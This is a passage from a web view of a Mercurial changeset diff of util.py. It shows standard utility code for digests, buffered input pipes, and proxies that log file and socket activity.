##// END OF EJS Templates
util: deprecate procutil proxy functions (API)...
Yuya Nishihara -
r37139:24ab3381 default
parent child Browse files
Show More
@@ -1,3851 +1,3860
1 1 # util.py - Mercurial utility functions and platform specific implementations
2 2 #
3 3 # Copyright 2005 K. Thananchayan <thananck@yahoo.com>
4 4 # Copyright 2005-2007 Matt Mackall <mpm@selenic.com>
5 5 # Copyright 2006 Vadim Gelfer <vadim.gelfer@gmail.com>
6 6 #
7 7 # This software may be used and distributed according to the terms of the
8 8 # GNU General Public License version 2 or any later version.
9 9
10 10 """Mercurial utility functions and platform specific implementations.
11 11
12 12 This contains helper routines that are independent of the SCM core and
13 13 hide platform-specific details from the core.
14 14 """
15 15
16 16 from __future__ import absolute_import, print_function
17 17
18 18 import abc
19 19 import bz2
20 20 import collections
21 21 import contextlib
22 22 import errno
23 23 import gc
24 24 import hashlib
25 25 import itertools
26 26 import mmap
27 27 import os
28 28 import platform as pyplatform
29 29 import re as remod
30 30 import shutil
31 31 import socket
32 32 import stat
33 33 import sys
34 34 import tempfile
35 35 import time
36 36 import traceback
37 37 import warnings
38 38 import zlib
39 39
40 40 from . import (
41 41 encoding,
42 42 error,
43 43 i18n,
44 44 node as nodemod,
45 45 policy,
46 46 pycompat,
47 47 urllibcompat,
48 48 )
49 49 from .utils import (
50 50 dateutil,
51 51 procutil,
52 52 stringutil,
53 53 )
54 54
55 55 base85 = policy.importmod(r'base85')
56 56 osutil = policy.importmod(r'osutil')
57 57 parsers = policy.importmod(r'parsers')
58 58
59 59 b85decode = base85.b85decode
60 60 b85encode = base85.b85encode
61 61
62 62 cookielib = pycompat.cookielib
63 63 empty = pycompat.empty
64 64 httplib = pycompat.httplib
65 65 pickle = pycompat.pickle
66 66 queue = pycompat.queue
67 67 safehasattr = pycompat.safehasattr
68 68 socketserver = pycompat.socketserver
69 69 bytesio = pycompat.bytesio
70 70 # TODO deprecate stringio name, as it is a lie on Python 3.
71 71 stringio = bytesio
72 72 xmlrpclib = pycompat.xmlrpclib
73 73
74 74 httpserver = urllibcompat.httpserver
75 75 urlerr = urllibcompat.urlerr
76 76 urlreq = urllibcompat.urlreq
77 77
78 78 # workaround for win32mbcs
79 79 _filenamebytestr = pycompat.bytestr
80 80
81 81 if pycompat.iswindows:
82 82 from . import windows as platform
83 83 else:
84 84 from . import posix as platform
85 85
86 86 _ = i18n._
87 87
88 88 bindunixsocket = platform.bindunixsocket
89 89 cachestat = platform.cachestat
90 90 checkexec = platform.checkexec
91 91 checklink = platform.checklink
92 92 copymode = platform.copymode
93 93 expandglobs = platform.expandglobs
94 94 getfsmountpoint = platform.getfsmountpoint
95 95 getfstype = platform.getfstype
96 96 groupmembers = platform.groupmembers
97 97 groupname = platform.groupname
98 98 isexec = platform.isexec
99 99 isowner = platform.isowner
100 100 listdir = osutil.listdir
101 101 localpath = platform.localpath
102 102 lookupreg = platform.lookupreg
103 103 makedir = platform.makedir
104 104 nlinks = platform.nlinks
105 105 normpath = platform.normpath
106 106 normcase = platform.normcase
107 107 normcasespec = platform.normcasespec
108 108 normcasefallback = platform.normcasefallback
109 109 openhardlinks = platform.openhardlinks
110 110 oslink = platform.oslink
111 111 parsepatchoutput = platform.parsepatchoutput
112 112 pconvert = platform.pconvert
113 113 poll = platform.poll
114 114 posixfile = platform.posixfile
115 115 rename = platform.rename
116 116 removedirs = platform.removedirs
117 117 samedevice = platform.samedevice
118 118 samefile = platform.samefile
119 119 samestat = platform.samestat
120 120 setflags = platform.setflags
121 121 split = platform.split
122 122 statfiles = getattr(osutil, 'statfiles', platform.statfiles)
123 123 statisexec = platform.statisexec
124 124 statislink = platform.statislink
125 125 umask = platform.umask
126 126 unlink = platform.unlink
127 127 username = platform.username
128 128
129 129 try:
130 130 recvfds = osutil.recvfds
131 131 except AttributeError:
132 132 pass
133 133
134 134 # Python compatibility
135 135
136 136 _notset = object()
137 137
138 138 def _rapply(f, xs):
139 139 if xs is None:
140 140 # assume None means non-value of optional data
141 141 return xs
142 142 if isinstance(xs, (list, set, tuple)):
143 143 return type(xs)(_rapply(f, x) for x in xs)
144 144 if isinstance(xs, dict):
145 145 return type(xs)((_rapply(f, k), _rapply(f, v)) for k, v in xs.items())
146 146 return f(xs)
147 147
148 148 def rapply(f, xs):
149 149 """Apply function recursively to every item preserving the data structure
150 150
151 151 >>> def f(x):
152 152 ... return 'f(%s)' % x
153 153 >>> rapply(f, None) is None
154 154 True
155 155 >>> rapply(f, 'a')
156 156 'f(a)'
157 157 >>> rapply(f, {'a'}) == {'f(a)'}
158 158 True
159 159 >>> rapply(f, ['a', 'b', None, {'c': 'd'}, []])
160 160 ['f(a)', 'f(b)', None, {'f(c)': 'f(d)'}, []]
161 161
162 162 >>> xs = [object()]
163 163 >>> rapply(pycompat.identity, xs) is xs
164 164 True
165 165 """
166 166 if f is pycompat.identity:
167 167 # fast path mainly for py2
168 168 return xs
169 169 return _rapply(f, xs)
170 170
171 171 def bitsfrom(container):
172 172 bits = 0
173 173 for bit in container:
174 174 bits |= bit
175 175 return bits
176 176
177 177 # python 2.6 still have deprecation warning enabled by default. We do not want
178 178 # to display anything to standard user so detect if we are running test and
179 179 # only use python deprecation warning in this case.
180 180 _dowarn = bool(encoding.environ.get('HGEMITWARNINGS'))
181 181 if _dowarn:
182 182 # explicitly unfilter our warning for python 2.7
183 183 #
184 184 # The option of setting PYTHONWARNINGS in the test runner was investigated.
185 185 # However, module name set through PYTHONWARNINGS was exactly matched, so
186 186 # we cannot set 'mercurial' and have it match eg: 'mercurial.scmutil'. This
187 187 # makes the whole PYTHONWARNINGS thing useless for our usecase.
188 188 warnings.filterwarnings(r'default', r'', DeprecationWarning, r'mercurial')
189 189 warnings.filterwarnings(r'default', r'', DeprecationWarning, r'hgext')
190 190 warnings.filterwarnings(r'default', r'', DeprecationWarning, r'hgext3rd')
191 191 if _dowarn and pycompat.ispy3:
192 192 # silence warning emitted by passing user string to re.sub()
193 193 warnings.filterwarnings(r'ignore', r'bad escape', DeprecationWarning,
194 194 r'mercurial')
195 195 warnings.filterwarnings(r'ignore', r'invalid escape sequence',
196 196 DeprecationWarning, r'mercurial')
197 197
198 198 def nouideprecwarn(msg, version, stacklevel=1):
199 199 """Issue an python native deprecation warning
200 200
201 201 This is a noop outside of tests, use 'ui.deprecwarn' when possible.
202 202 """
203 203 if _dowarn:
204 204 msg += ("\n(compatibility will be dropped after Mercurial-%s,"
205 205 " update your code.)") % version
206 206 warnings.warn(pycompat.sysstr(msg), DeprecationWarning, stacklevel + 1)
207 207
208 208 DIGESTS = {
209 209 'md5': hashlib.md5,
210 210 'sha1': hashlib.sha1,
211 211 'sha512': hashlib.sha512,
212 212 }
213 213 # List of digest types from strongest to weakest
214 214 DIGESTS_BY_STRENGTH = ['sha512', 'sha1', 'md5']
215 215
216 216 for k in DIGESTS_BY_STRENGTH:
217 217 assert k in DIGESTS
218 218
219 219 class digester(object):
220 220 """helper to compute digests.
221 221
222 222 This helper can be used to compute one or more digests given their name.
223 223
224 224 >>> d = digester([b'md5', b'sha1'])
225 225 >>> d.update(b'foo')
226 226 >>> [k for k in sorted(d)]
227 227 ['md5', 'sha1']
228 228 >>> d[b'md5']
229 229 'acbd18db4cc2f85cedef654fccc4a4d8'
230 230 >>> d[b'sha1']
231 231 '0beec7b5ea3f0fdbc95d0dd47f3c5bc275da8a33'
232 232 >>> digester.preferred([b'md5', b'sha1'])
233 233 'sha1'
234 234 """
235 235
236 236 def __init__(self, digests, s=''):
237 237 self._hashes = {}
238 238 for k in digests:
239 239 if k not in DIGESTS:
240 240 raise error.Abort(_('unknown digest type: %s') % k)
241 241 self._hashes[k] = DIGESTS[k]()
242 242 if s:
243 243 self.update(s)
244 244
245 245 def update(self, data):
246 246 for h in self._hashes.values():
247 247 h.update(data)
248 248
249 249 def __getitem__(self, key):
250 250 if key not in DIGESTS:
251 251 raise error.Abort(_('unknown digest type: %s') % k)
252 252 return nodemod.hex(self._hashes[key].digest())
253 253
254 254 def __iter__(self):
255 255 return iter(self._hashes)
256 256
257 257 @staticmethod
258 258 def preferred(supported):
259 259 """returns the strongest digest type in both supported and DIGESTS."""
260 260
261 261 for k in DIGESTS_BY_STRENGTH:
262 262 if k in supported:
263 263 return k
264 264 return None
265 265
266 266 class digestchecker(object):
267 267 """file handle wrapper that additionally checks content against a given
268 268 size and digests.
269 269
270 270 d = digestchecker(fh, size, {'md5': '...'})
271 271
272 272 When multiple digests are given, all of them are validated.
273 273 """
274 274
275 275 def __init__(self, fh, size, digests):
276 276 self._fh = fh
277 277 self._size = size
278 278 self._got = 0
279 279 self._digests = dict(digests)
280 280 self._digester = digester(self._digests.keys())
281 281
282 282 def read(self, length=-1):
283 283 content = self._fh.read(length)
284 284 self._digester.update(content)
285 285 self._got += len(content)
286 286 return content
287 287
288 288 def validate(self):
289 289 if self._size != self._got:
290 290 raise error.Abort(_('size mismatch: expected %d, got %d') %
291 291 (self._size, self._got))
292 292 for k, v in self._digests.items():
293 293 if v != self._digester[k]:
294 294 # i18n: first parameter is a digest name
295 295 raise error.Abort(_('%s mismatch: expected %s, got %s') %
296 296 (k, v, self._digester[k]))
297 297
298 298 try:
299 299 buffer = buffer
300 300 except NameError:
301 301 def buffer(sliceable, offset=0, length=None):
302 302 if length is not None:
303 303 return memoryview(sliceable)[offset:offset + length]
304 304 return memoryview(sliceable)[offset:]
305 305
306 306 _chunksize = 4096
307 307
308 308 class bufferedinputpipe(object):
309 309 """a manually buffered input pipe
310 310
311 311 Python will not let us use buffered IO and lazy reading with 'polling' at
312 312 the same time. We cannot probe the buffer state and select will not detect
313 313 that data are ready to read if they are already buffered.
314 314
315 315 This class let us work around that by implementing its own buffering
316 316 (allowing efficient readline) while offering a way to know if the buffer is
317 317 empty from the output (allowing collaboration of the buffer with polling).
318 318
319 319 This class lives in the 'util' module because it makes use of the 'os'
320 320 module from the python stdlib.
321 321 """
322 322 def __new__(cls, fh):
323 323 # If we receive a fileobjectproxy, we need to use a variation of this
324 324 # class that notifies observers about activity.
325 325 if isinstance(fh, fileobjectproxy):
326 326 cls = observedbufferedinputpipe
327 327
328 328 return super(bufferedinputpipe, cls).__new__(cls)
329 329
330 330 def __init__(self, input):
331 331 self._input = input
332 332 self._buffer = []
333 333 self._eof = False
334 334 self._lenbuf = 0
335 335
336 336 @property
337 337 def hasbuffer(self):
338 338 """True is any data is currently buffered
339 339
340 340 This will be used externally a pre-step for polling IO. If there is
341 341 already data then no polling should be set in place."""
342 342 return bool(self._buffer)
343 343
344 344 @property
345 345 def closed(self):
346 346 return self._input.closed
347 347
348 348 def fileno(self):
349 349 return self._input.fileno()
350 350
351 351 def close(self):
352 352 return self._input.close()
353 353
354 354 def read(self, size):
355 355 while (not self._eof) and (self._lenbuf < size):
356 356 self._fillbuffer()
357 357 return self._frombuffer(size)
358 358
359 359 def readline(self, *args, **kwargs):
360 360 if 1 < len(self._buffer):
361 361 # this should not happen because both read and readline end with a
362 362 # _frombuffer call that collapse it.
363 363 self._buffer = [''.join(self._buffer)]
364 364 self._lenbuf = len(self._buffer[0])
365 365 lfi = -1
366 366 if self._buffer:
367 367 lfi = self._buffer[-1].find('\n')
368 368 while (not self._eof) and lfi < 0:
369 369 self._fillbuffer()
370 370 if self._buffer:
371 371 lfi = self._buffer[-1].find('\n')
372 372 size = lfi + 1
373 373 if lfi < 0: # end of file
374 374 size = self._lenbuf
375 375 elif 1 < len(self._buffer):
376 376 # we need to take previous chunks into account
377 377 size += self._lenbuf - len(self._buffer[-1])
378 378 return self._frombuffer(size)
379 379
380 380 def _frombuffer(self, size):
381 381 """return at most 'size' data from the buffer
382 382
383 383 The data are removed from the buffer."""
384 384 if size == 0 or not self._buffer:
385 385 return ''
386 386 buf = self._buffer[0]
387 387 if 1 < len(self._buffer):
388 388 buf = ''.join(self._buffer)
389 389
390 390 data = buf[:size]
391 391 buf = buf[len(data):]
392 392 if buf:
393 393 self._buffer = [buf]
394 394 self._lenbuf = len(buf)
395 395 else:
396 396 self._buffer = []
397 397 self._lenbuf = 0
398 398 return data
399 399
400 400 def _fillbuffer(self):
401 401 """read data to the buffer"""
402 402 data = os.read(self._input.fileno(), _chunksize)
403 403 if not data:
404 404 self._eof = True
405 405 else:
406 406 self._lenbuf += len(data)
407 407 self._buffer.append(data)
408 408
409 409 return data
410 410
411 411 def mmapread(fp):
412 412 try:
413 413 fd = getattr(fp, 'fileno', lambda: fp)()
414 414 return mmap.mmap(fd, 0, access=mmap.ACCESS_READ)
415 415 except ValueError:
416 416 # Empty files cannot be mmapped, but mmapread should still work. Check
417 417 # if the file is empty, and if so, return an empty buffer.
418 418 if os.fstat(fd).st_size == 0:
419 419 return ''
420 420 raise
421 421
422 422 class fileobjectproxy(object):
423 423 """A proxy around file objects that tells a watcher when events occur.
424 424
425 425 This type is intended to only be used for testing purposes. Think hard
426 426 before using it in important code.
427 427 """
428 428 __slots__ = (
429 429 r'_orig',
430 430 r'_observer',
431 431 )
432 432
433 433 def __init__(self, fh, observer):
434 434 object.__setattr__(self, r'_orig', fh)
435 435 object.__setattr__(self, r'_observer', observer)
436 436
437 437 def __getattribute__(self, name):
438 438 ours = {
439 439 r'_observer',
440 440
441 441 # IOBase
442 442 r'close',
443 443 # closed if a property
444 444 r'fileno',
445 445 r'flush',
446 446 r'isatty',
447 447 r'readable',
448 448 r'readline',
449 449 r'readlines',
450 450 r'seek',
451 451 r'seekable',
452 452 r'tell',
453 453 r'truncate',
454 454 r'writable',
455 455 r'writelines',
456 456 # RawIOBase
457 457 r'read',
458 458 r'readall',
459 459 r'readinto',
460 460 r'write',
461 461 # BufferedIOBase
462 462 # raw is a property
463 463 r'detach',
464 464 # read defined above
465 465 r'read1',
466 466 # readinto defined above
467 467 # write defined above
468 468 }
469 469
470 470 # We only observe some methods.
471 471 if name in ours:
472 472 return object.__getattribute__(self, name)
473 473
474 474 return getattr(object.__getattribute__(self, r'_orig'), name)
475 475
476 476 def __nonzero__(self):
477 477 return bool(object.__getattribute__(self, r'_orig'))
478 478
479 479 __bool__ = __nonzero__
480 480
481 481 def __delattr__(self, name):
482 482 return delattr(object.__getattribute__(self, r'_orig'), name)
483 483
484 484 def __setattr__(self, name, value):
485 485 return setattr(object.__getattribute__(self, r'_orig'), name, value)
486 486
487 487 def __iter__(self):
488 488 return object.__getattribute__(self, r'_orig').__iter__()
489 489
490 490 def _observedcall(self, name, *args, **kwargs):
491 491 # Call the original object.
492 492 orig = object.__getattribute__(self, r'_orig')
493 493 res = getattr(orig, name)(*args, **kwargs)
494 494
495 495 # Call a method on the observer of the same name with arguments
496 496 # so it can react, log, etc.
497 497 observer = object.__getattribute__(self, r'_observer')
498 498 fn = getattr(observer, name, None)
499 499 if fn:
500 500 fn(res, *args, **kwargs)
501 501
502 502 return res
503 503
504 504 def close(self, *args, **kwargs):
505 505 return object.__getattribute__(self, r'_observedcall')(
506 506 r'close', *args, **kwargs)
507 507
508 508 def fileno(self, *args, **kwargs):
509 509 return object.__getattribute__(self, r'_observedcall')(
510 510 r'fileno', *args, **kwargs)
511 511
512 512 def flush(self, *args, **kwargs):
513 513 return object.__getattribute__(self, r'_observedcall')(
514 514 r'flush', *args, **kwargs)
515 515
516 516 def isatty(self, *args, **kwargs):
517 517 return object.__getattribute__(self, r'_observedcall')(
518 518 r'isatty', *args, **kwargs)
519 519
520 520 def readable(self, *args, **kwargs):
521 521 return object.__getattribute__(self, r'_observedcall')(
522 522 r'readable', *args, **kwargs)
523 523
524 524 def readline(self, *args, **kwargs):
525 525 return object.__getattribute__(self, r'_observedcall')(
526 526 r'readline', *args, **kwargs)
527 527
528 528 def readlines(self, *args, **kwargs):
529 529 return object.__getattribute__(self, r'_observedcall')(
530 530 r'readlines', *args, **kwargs)
531 531
532 532 def seek(self, *args, **kwargs):
533 533 return object.__getattribute__(self, r'_observedcall')(
534 534 r'seek', *args, **kwargs)
535 535
536 536 def seekable(self, *args, **kwargs):
537 537 return object.__getattribute__(self, r'_observedcall')(
538 538 r'seekable', *args, **kwargs)
539 539
540 540 def tell(self, *args, **kwargs):
541 541 return object.__getattribute__(self, r'_observedcall')(
542 542 r'tell', *args, **kwargs)
543 543
544 544 def truncate(self, *args, **kwargs):
545 545 return object.__getattribute__(self, r'_observedcall')(
546 546 r'truncate', *args, **kwargs)
547 547
548 548 def writable(self, *args, **kwargs):
549 549 return object.__getattribute__(self, r'_observedcall')(
550 550 r'writable', *args, **kwargs)
551 551
552 552 def writelines(self, *args, **kwargs):
553 553 return object.__getattribute__(self, r'_observedcall')(
554 554 r'writelines', *args, **kwargs)
555 555
556 556 def read(self, *args, **kwargs):
557 557 return object.__getattribute__(self, r'_observedcall')(
558 558 r'read', *args, **kwargs)
559 559
560 560 def readall(self, *args, **kwargs):
561 561 return object.__getattribute__(self, r'_observedcall')(
562 562 r'readall', *args, **kwargs)
563 563
564 564 def readinto(self, *args, **kwargs):
565 565 return object.__getattribute__(self, r'_observedcall')(
566 566 r'readinto', *args, **kwargs)
567 567
568 568 def write(self, *args, **kwargs):
569 569 return object.__getattribute__(self, r'_observedcall')(
570 570 r'write', *args, **kwargs)
571 571
572 572 def detach(self, *args, **kwargs):
573 573 return object.__getattribute__(self, r'_observedcall')(
574 574 r'detach', *args, **kwargs)
575 575
576 576 def read1(self, *args, **kwargs):
577 577 return object.__getattribute__(self, r'_observedcall')(
578 578 r'read1', *args, **kwargs)
579 579
580 580 class observedbufferedinputpipe(bufferedinputpipe):
581 581 """A variation of bufferedinputpipe that is aware of fileobjectproxy.
582 582
583 583 ``bufferedinputpipe`` makes low-level calls to ``os.read()`` that
584 584 bypass ``fileobjectproxy``. Because of this, we need to make
585 585 ``bufferedinputpipe`` aware of these operations.
586 586
587 587 This variation of ``bufferedinputpipe`` can notify observers about
588 588 ``os.read()`` events. It also re-publishes other events, such as
589 589 ``read()`` and ``readline()``.
590 590 """
591 591 def _fillbuffer(self):
592 592 res = super(observedbufferedinputpipe, self)._fillbuffer()
593 593
594 594 fn = getattr(self._input._observer, r'osread', None)
595 595 if fn:
596 596 fn(res, _chunksize)
597 597
598 598 return res
599 599
600 600 # We use different observer methods because the operation isn't
601 601 # performed on the actual file object but on us.
602 602 def read(self, size):
603 603 res = super(observedbufferedinputpipe, self).read(size)
604 604
605 605 fn = getattr(self._input._observer, r'bufferedread', None)
606 606 if fn:
607 607 fn(res, size)
608 608
609 609 return res
610 610
611 611 def readline(self, *args, **kwargs):
612 612 res = super(observedbufferedinputpipe, self).readline(*args, **kwargs)
613 613
614 614 fn = getattr(self._input._observer, r'bufferedreadline', None)
615 615 if fn:
616 616 fn(res)
617 617
618 618 return res
619 619
620 620 PROXIED_SOCKET_METHODS = {
621 621 r'makefile',
622 622 r'recv',
623 623 r'recvfrom',
624 624 r'recvfrom_into',
625 625 r'recv_into',
626 626 r'send',
627 627 r'sendall',
628 628 r'sendto',
629 629 r'setblocking',
630 630 r'settimeout',
631 631 r'gettimeout',
632 632 r'setsockopt',
633 633 }
634 634
635 635 class socketproxy(object):
636 636 """A proxy around a socket that tells a watcher when events occur.
637 637
638 638 This is like ``fileobjectproxy`` except for sockets.
639 639
640 640 This type is intended to only be used for testing purposes. Think hard
641 641 before using it in important code.
642 642 """
643 643 __slots__ = (
644 644 r'_orig',
645 645 r'_observer',
646 646 )
647 647
648 648 def __init__(self, sock, observer):
649 649 object.__setattr__(self, r'_orig', sock)
650 650 object.__setattr__(self, r'_observer', observer)
651 651
652 652 def __getattribute__(self, name):
653 653 if name in PROXIED_SOCKET_METHODS:
654 654 return object.__getattribute__(self, name)
655 655
656 656 return getattr(object.__getattribute__(self, r'_orig'), name)
657 657
658 658 def __delattr__(self, name):
659 659 return delattr(object.__getattribute__(self, r'_orig'), name)
660 660
661 661 def __setattr__(self, name, value):
662 662 return setattr(object.__getattribute__(self, r'_orig'), name, value)
663 663
664 664 def __nonzero__(self):
665 665 return bool(object.__getattribute__(self, r'_orig'))
666 666
667 667 __bool__ = __nonzero__
668 668
669 669 def _observedcall(self, name, *args, **kwargs):
670 670 # Call the original object.
671 671 orig = object.__getattribute__(self, r'_orig')
672 672 res = getattr(orig, name)(*args, **kwargs)
673 673
674 674 # Call a method on the observer of the same name with arguments
675 675 # so it can react, log, etc.
676 676 observer = object.__getattribute__(self, r'_observer')
677 677 fn = getattr(observer, name, None)
678 678 if fn:
679 679 fn(res, *args, **kwargs)
680 680
681 681 return res
682 682
683 683 def makefile(self, *args, **kwargs):
684 684 res = object.__getattribute__(self, r'_observedcall')(
685 685 r'makefile', *args, **kwargs)
686 686
687 687 # The file object may be used for I/O. So we turn it into a
688 688 # proxy using our observer.
689 689 observer = object.__getattribute__(self, r'_observer')
690 690 return makeloggingfileobject(observer.fh, res, observer.name,
691 691 reads=observer.reads,
692 692 writes=observer.writes,
693 693 logdata=observer.logdata,
694 694 logdataapis=observer.logdataapis)
695 695
696 696 def recv(self, *args, **kwargs):
697 697 return object.__getattribute__(self, r'_observedcall')(
698 698 r'recv', *args, **kwargs)
699 699
700 700 def recvfrom(self, *args, **kwargs):
701 701 return object.__getattribute__(self, r'_observedcall')(
702 702 r'recvfrom', *args, **kwargs)
703 703
704 704 def recvfrom_into(self, *args, **kwargs):
705 705 return object.__getattribute__(self, r'_observedcall')(
706 706 r'recvfrom_into', *args, **kwargs)
707 707
708 708 def recv_into(self, *args, **kwargs):
709 709 return object.__getattribute__(self, r'_observedcall')(
710 710 r'recv_info', *args, **kwargs)
711 711
712 712 def send(self, *args, **kwargs):
713 713 return object.__getattribute__(self, r'_observedcall')(
714 714 r'send', *args, **kwargs)
715 715
716 716 def sendall(self, *args, **kwargs):
717 717 return object.__getattribute__(self, r'_observedcall')(
718 718 r'sendall', *args, **kwargs)
719 719
720 720 def sendto(self, *args, **kwargs):
721 721 return object.__getattribute__(self, r'_observedcall')(
722 722 r'sendto', *args, **kwargs)
723 723
724 724 def setblocking(self, *args, **kwargs):
725 725 return object.__getattribute__(self, r'_observedcall')(
726 726 r'setblocking', *args, **kwargs)
727 727
728 728 def settimeout(self, *args, **kwargs):
729 729 return object.__getattribute__(self, r'_observedcall')(
730 730 r'settimeout', *args, **kwargs)
731 731
732 732 def gettimeout(self, *args, **kwargs):
733 733 return object.__getattribute__(self, r'_observedcall')(
734 734 r'gettimeout', *args, **kwargs)
735 735
736 736 def setsockopt(self, *args, **kwargs):
737 737 return object.__getattribute__(self, r'_observedcall')(
738 738 r'setsockopt', *args, **kwargs)
739 739
740 740 class baseproxyobserver(object):
741 741 def _writedata(self, data):
742 742 if not self.logdata:
743 743 if self.logdataapis:
744 744 self.fh.write('\n')
745 745 self.fh.flush()
746 746 return
747 747
748 748 # Simple case writes all data on a single line.
749 749 if b'\n' not in data:
750 750 if self.logdataapis:
751 751 self.fh.write(': %s\n' % stringutil.escapedata(data))
752 752 else:
753 753 self.fh.write('%s> %s\n'
754 754 % (self.name, stringutil.escapedata(data)))
755 755 self.fh.flush()
756 756 return
757 757
758 758 # Data with newlines is written to multiple lines.
759 759 if self.logdataapis:
760 760 self.fh.write(':\n')
761 761
762 762 lines = data.splitlines(True)
763 763 for line in lines:
764 764 self.fh.write('%s> %s\n'
765 765 % (self.name, stringutil.escapedata(line)))
766 766 self.fh.flush()
767 767
768 768 class fileobjectobserver(baseproxyobserver):
769 769 """Logs file object activity."""
770 770 def __init__(self, fh, name, reads=True, writes=True, logdata=False,
771 771 logdataapis=True):
772 772 self.fh = fh
773 773 self.name = name
774 774 self.logdata = logdata
775 775 self.logdataapis = logdataapis
776 776 self.reads = reads
777 777 self.writes = writes
778 778
779 779 def read(self, res, size=-1):
780 780 if not self.reads:
781 781 return
782 782 # Python 3 can return None from reads at EOF instead of empty strings.
783 783 if res is None:
784 784 res = ''
785 785
786 786 if self.logdataapis:
787 787 self.fh.write('%s> read(%d) -> %d' % (self.name, size, len(res)))
788 788
789 789 self._writedata(res)
790 790
791 791 def readline(self, res, limit=-1):
792 792 if not self.reads:
793 793 return
794 794
795 795 if self.logdataapis:
796 796 self.fh.write('%s> readline() -> %d' % (self.name, len(res)))
797 797
798 798 self._writedata(res)
799 799
800 800 def readinto(self, res, dest):
801 801 if not self.reads:
802 802 return
803 803
804 804 if self.logdataapis:
805 805 self.fh.write('%s> readinto(%d) -> %r' % (self.name, len(dest),
806 806 res))
807 807
808 808 data = dest[0:res] if res is not None else b''
809 809 self._writedata(data)
810 810
811 811 def write(self, res, data):
812 812 if not self.writes:
813 813 return
814 814
815 815 # Python 2 returns None from some write() calls. Python 3 (reasonably)
816 816 # returns the integer bytes written.
817 817 if res is None and data:
818 818 res = len(data)
819 819
820 820 if self.logdataapis:
821 821 self.fh.write('%s> write(%d) -> %r' % (self.name, len(data), res))
822 822
823 823 self._writedata(data)
824 824
825 825 def flush(self, res):
826 826 if not self.writes:
827 827 return
828 828
829 829 self.fh.write('%s> flush() -> %r\n' % (self.name, res))
830 830
831 831 # For observedbufferedinputpipe.
832 832 def bufferedread(self, res, size):
833 833 if not self.reads:
834 834 return
835 835
836 836 if self.logdataapis:
837 837 self.fh.write('%s> bufferedread(%d) -> %d' % (
838 838 self.name, size, len(res)))
839 839
840 840 self._writedata(res)
841 841
842 842 def bufferedreadline(self, res):
843 843 if not self.reads:
844 844 return
845 845
846 846 if self.logdataapis:
847 847 self.fh.write('%s> bufferedreadline() -> %d' % (
848 848 self.name, len(res)))
849 849
850 850 self._writedata(res)
851 851
852 852 def makeloggingfileobject(logh, fh, name, reads=True, writes=True,
853 853 logdata=False, logdataapis=True):
854 854 """Turn a file object into a logging file object."""
855 855
856 856 observer = fileobjectobserver(logh, name, reads=reads, writes=writes,
857 857 logdata=logdata, logdataapis=logdataapis)
858 858 return fileobjectproxy(fh, observer)
859 859
860 860 class socketobserver(baseproxyobserver):
861 861 """Logs socket activity."""
862 862 def __init__(self, fh, name, reads=True, writes=True, states=True,
863 863 logdata=False, logdataapis=True):
864 864 self.fh = fh
865 865 self.name = name
866 866 self.reads = reads
867 867 self.writes = writes
868 868 self.states = states
869 869 self.logdata = logdata
870 870 self.logdataapis = logdataapis
871 871
872 872 def makefile(self, res, mode=None, bufsize=None):
873 873 if not self.states:
874 874 return
875 875
876 876 self.fh.write('%s> makefile(%r, %r)\n' % (
877 877 self.name, mode, bufsize))
878 878
879 879 def recv(self, res, size, flags=0):
880 880 if not self.reads:
881 881 return
882 882
883 883 if self.logdataapis:
884 884 self.fh.write('%s> recv(%d, %d) -> %d' % (
885 885 self.name, size, flags, len(res)))
886 886 self._writedata(res)
887 887
888 888 def recvfrom(self, res, size, flags=0):
889 889 if not self.reads:
890 890 return
891 891
892 892 if self.logdataapis:
893 893 self.fh.write('%s> recvfrom(%d, %d) -> %d' % (
894 894 self.name, size, flags, len(res[0])))
895 895
896 896 self._writedata(res[0])
897 897
898 898 def recvfrom_into(self, res, buf, size, flags=0):
899 899 if not self.reads:
900 900 return
901 901
902 902 if self.logdataapis:
903 903 self.fh.write('%s> recvfrom_into(%d, %d) -> %d' % (
904 904 self.name, size, flags, res[0]))
905 905
906 906 self._writedata(buf[0:res[0]])
907 907
908 908 def recv_into(self, res, buf, size=0, flags=0):
909 909 if not self.reads:
910 910 return
911 911
912 912 if self.logdataapis:
913 913 self.fh.write('%s> recv_into(%d, %d) -> %d' % (
914 914 self.name, size, flags, res))
915 915
916 916 self._writedata(buf[0:res])
917 917
918 918 def send(self, res, data, flags=0):
919 919 if not self.writes:
920 920 return
921 921
922 922 self.fh.write('%s> send(%d, %d) -> %d' % (
923 923 self.name, len(data), flags, len(res)))
924 924 self._writedata(data)
925 925
926 926 def sendall(self, res, data, flags=0):
927 927 if not self.writes:
928 928 return
929 929
930 930 if self.logdataapis:
931 931 # Returns None on success. So don't bother reporting return value.
932 932 self.fh.write('%s> sendall(%d, %d)' % (
933 933 self.name, len(data), flags))
934 934
935 935 self._writedata(data)
936 936
937 937 def sendto(self, res, data, flagsoraddress, address=None):
938 938 if not self.writes:
939 939 return
940 940
941 941 if address:
942 942 flags = flagsoraddress
943 943 else:
944 944 flags = 0
945 945
946 946 if self.logdataapis:
947 947 self.fh.write('%s> sendto(%d, %d, %r) -> %d' % (
948 948 self.name, len(data), flags, address, res))
949 949
950 950 self._writedata(data)
951 951
952 952 def setblocking(self, res, flag):
953 953 if not self.states:
954 954 return
955 955
956 956 self.fh.write('%s> setblocking(%r)\n' % (self.name, flag))
957 957
958 958 def settimeout(self, res, value):
959 959 if not self.states:
960 960 return
961 961
962 962 self.fh.write('%s> settimeout(%r)\n' % (self.name, value))
963 963
964 964 def gettimeout(self, res):
965 965 if not self.states:
966 966 return
967 967
968 968 self.fh.write('%s> gettimeout() -> %f\n' % (self.name, res))
969 969
970 970 def setsockopt(self, level, optname, value):
971 971 if not self.states:
972 972 return
973 973
974 974 self.fh.write('%s> setsockopt(%r, %r, %r) -> %r\n' % (
975 975 self.name, level, optname, value))
976 976
977 977 def makeloggingsocket(logh, fh, name, reads=True, writes=True, states=True,
978 978 logdata=False, logdataapis=True):
979 979 """Turn a socket into a logging socket."""
980 980
981 981 observer = socketobserver(logh, name, reads=reads, writes=writes,
982 982 states=states, logdata=logdata,
983 983 logdataapis=logdataapis)
984 984 return socketproxy(fh, observer)
985 985
986 986 def version():
987 987 """Return version information if available."""
988 988 try:
989 989 from . import __version__
990 990 return __version__.version
991 991 except ImportError:
992 992 return 'unknown'
993 993
994 994 def versiontuple(v=None, n=4):
995 995 """Parses a Mercurial version string into an N-tuple.
996 996
997 997 The version string to be parsed is specified with the ``v`` argument.
998 998 If it isn't defined, the current Mercurial version string will be parsed.
999 999
1000 1000 ``n`` can be 2, 3, or 4. Here is how some version strings map to
1001 1001 returned values:
1002 1002
